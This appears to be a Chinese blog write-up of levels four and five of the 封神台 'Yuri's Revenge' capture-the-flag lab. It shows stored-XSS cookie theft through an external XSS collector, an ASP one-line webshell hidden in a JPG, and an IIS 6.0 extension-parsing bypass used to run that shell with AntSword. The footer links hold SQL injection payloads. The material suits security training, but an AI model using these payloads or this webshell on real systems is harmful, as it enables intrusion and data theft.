封神台-尤里的复仇Ⅰ
靶场链接:https://hack.zkaq.cn/
文章目录
- 前言
- 四、为了更多的权限!留言板!
- 五、进击!拿到Web最高权限!
- 总结
前言
本来打算把尤里的复仇都做了,做到六就卡住了,不想做了,以后做了再写上来
第一章是简单的sql注入。第二章我的ModHeader似乎不起作用。。也没有做出来
四、为了更多的权限!留言板!
传送门:http://59.63.200.79:8004/Feedback.asp
Tips:
1、存储型Xss
2、flag在cookie里,格式为zkz{…},xss bot 每10秒访问一次页面
3、自建Xss平台源码:http://www.zkaq.org/?t/99.html
经过一番操作,尤里虽然进入到后台,窃窃自喜的他不满足于此,作为黑阔他要挑战曾经的自己,他要攻克之前失手的网站!
他重新浏览之前的网站,这时他突然发现了一个留言板功能。而留言板管理员是每天都会去查阅的。
尤里开始动手……
打开网站,从tips可以知道留言板功能存在存储型XSS,在留言板的各个输入框都输入以下代码进行测试
<script>alert("XSS")</script>
发现有xss弹窗,这里我们在XSS平台上创建一个项目(平台链接:https://xss.pt/xss.php)
创建好后,勾选前两项
复制代码到可能存在注入的地方,然后回到XSS平台发现收到注入反馈
发现flag,提交
五、进击!拿到Web最高权限!
传送门:http://59.63.200.79:8005/admin/default.asp
Tips:
1、通过修改Cookie登录后台(没用重打)
2、上传SHELL!
3、Flag在web根目录(flag.php)
4、上传图片时建议上传小文件,我建议用QQ表情
尤里通过XSS终于得到了管理员Cookie,在修改了cookie后尤里直接绕过了登录密码,看到了后台功能!
接下来要做的,就是找一个上传点,上传自己的shell了!
1、在XSS平台拿到第四关的cookie,删去flag=zkz{…},修改cookie,点击“准备好了吗”或者刷新进入后台
2、寻找上传点
在产品管理-添加产品中可以上传文件:
3、上传asp一句话图片木马
- 如何制作asp图片木马:
(1)找一张图片,名字改成1.jpg
(2)<%eval request(“pass”)%>存为1.asp 其中request为函数,pass是密码
(3)copy 1.jpg /b + 1.asp /a asp.jpg 存为1.bat文件(当前文件夹下cmd)
复制当前目录下的1.jpg图片和当前目录下的1.asp文件并以ASCII代码的方式合并为 asp.jpg图片,运行1.bat,就会出现一个图片asp.jpg,现在这个asp.jpg就是已经做好的木马了。
(本来是asp.jpg,后面连接蚁剑有IIS解析漏洞,所以改成了.cer)
上传成功
4、蚁剑连接
405错误,IIS/6.0
- IIS解析漏洞
- 目录解析
以*.asp命名的文件夹里的文件都将会被当成ASP文件执行。
- 文件解析
对于 *.asp;.jpg 像这种畸形文件名在";"后面的直接被忽略,也就是说当成 *.asp文件执行。
- IIS6.0 默认的可执行文件除了asp还包含这三种 *.asa *.cer *.cdx
将图片木马后缀改为.cer再次上传
500错误,检查了一下shell type是php没有改成asp,重新选择后连接成功
找到flag.txt文件,打开得到flag
六七八九
总结
还要再加强,知识太匮乏了
封神台-尤里的复仇Ⅰ相关推荐
- 封神台----尤里的复仇I-第一章:为了女神小芳
1.找注入点 ?id=1 and 1=1 ------ 显示正常 ?id=1 and 1=2 ------ 不显示 2.猜列数.报显示位 ?id=1 order by 2 ------查询了两列 ?i ...
- 封神台-尤里的复仇II 回归sql-注入绕过防护getshell
http://cntj8003.ia.aqlab.cn/bees/admin/login.phpz 直接在给出的靶场链接后面加上admin回车,跳转到后台登录页面,没有做目录扫描 1.在用户名处加上' ...
- 封神台----尤里的复仇I-第四章:为了更多的权限!留言板!!
本章主要是xss平台使用,很简单. 自己搭建xss平台或者网上随便找个平台注册使用. 新建个项目,建好后,将下面代码复制到留言板里. 提交,即可.去XSS平台接收消息. 提交,完成.
- 封神台 -尤里的复仇Ⅰ write up 夜车星繁的博客
无意间知道了这个靶场,可作为复习用,就将它安排进了复习计划里,在此篇博客写下记录留作未来回顾用.因为有了点基础在此写下payload只保证自己可以看得懂. 第一章:为了女神小芳! ?id=1 and ...
- 【封神台 - 掌控安全靶场】尤里的复仇 Ⅰ 小芳!一二三四五六七章
[封神台 - 掌控安全靶场]尤里的复仇 小芳! 第一章:为了女神小芳! SQL注入攻击原理实战演练 一.判断是否存在sql注入漏洞 二.判断字段数 三.判断回显点 四.正式注入 五.sql自动化注入 ...
- 封神台-第二章 尤里的复仇
封神台-第二章 尤里的复仇 1. 任意选择一条新闻动态 2. 发现出现交互界面 url中id=170 存在注入点 3.判断字段数 ?id=170+order+by+10 ?id=170+order+b ...
- 【封神台 - 掌控安全靶场】尤里的复仇 Ⅰ 小芳 一二三四五六章
[封神台 - 掌控安全靶场]尤里的复仇 Ⅰ 小芳 一二三四五六章 文章目录 [封神台 - 掌控安全靶场]尤里的复仇 Ⅰ 小芳 一二三四五六章 第一章:为了女神小芳 SQL注入攻击原理实战演练 第二章: ...
- 封神台在线靶场--尤里的复仇Ⅰ 小芳!【8题】
尤里的复仇Ⅰ 小芳![8题] 第一章:为了女神小芳! 第二章:遇到阻难!绕过WAF过滤! 第三章:为了更多的权限!留言板! 第四章:进击!拿到Web最高权限! 第五章:SYSTEM!POWER! 第六 ...
- 封神台 第四章:进击!拿到Web最高权限(绕过防护上传木马)
封神台 https://hack.zkaq.cn 一.1.通过修改Cookie登录后台(没用重打) 2,上传SHELL!3,Flag在网站根目录(flag.php) 3 ...
最新文章
- Codeforces Round #658 (Div. 2)部分题解
- phpHiveAdmin开发两个月记录
- Struts2 配置文件手册
- Shell命令-文件及目录操作之chattr、lsattr
- tensorrt轻松部署高性能dnn推理_部署环境之:tensorRT的插件
- dbscan用 java代码_聚类算法之DBScan(Java实现)[转]
- java学习(138):异常处理
- spring bean的创建,生命周期
- 乳化液稳定剂php,乳化液稳定剂PHP对小于0.1mm煤泥浮选的影响
- Install R language on Linux RHEL5 or RHEL6
- 逍遥单机卡系统服务器ip,逍遥剑侠情缘私服架设源码+APP端+搭建教程
- 扑克类游戏斗地主、蜘蛛纸牌源码
- HYSPLIT模式简介及使用
- php 客服工单分配问题,最全客服工单系统功能介绍
- vue tab页面缓存处理
- 无法访问yunlong.wj0920wjx.net指向的web服务器(或虚拟主机)的目录,请检查网络设置
- JAVA校招基础面试题
- 【无标题】前端电子签名的canvas画板
- python 蟒蛇程序详解_软件测试学习教程——【大蟒蛇】python基础
- Linux企业化运维--(7)redis服务之redis配置及主从复制、主从自动切换、集群、redis+mysql、gearman实现数据同步
热门文章
- FPGA基本引脚知识
- 国内移动应用开发平台哪家强?
- 跟尤雨溪一起解读Vue3源码笔记- Vue Mastery
- vue 外部字体图标使用,无须绝对路径引入办法
- Yann LeCun,牛人也!
- 【快直播android demo】SDP交互
- 描述你所用计算机,你说的描述电脑问题是什么意思啊 爱问知识人
- Linux:使用云盘
- Git 操作遇到 Found a swap file by the name “~/xxxx/.git/. COMMIT_EDI_TMSG. Swp“
- 中国历史“四大谜案”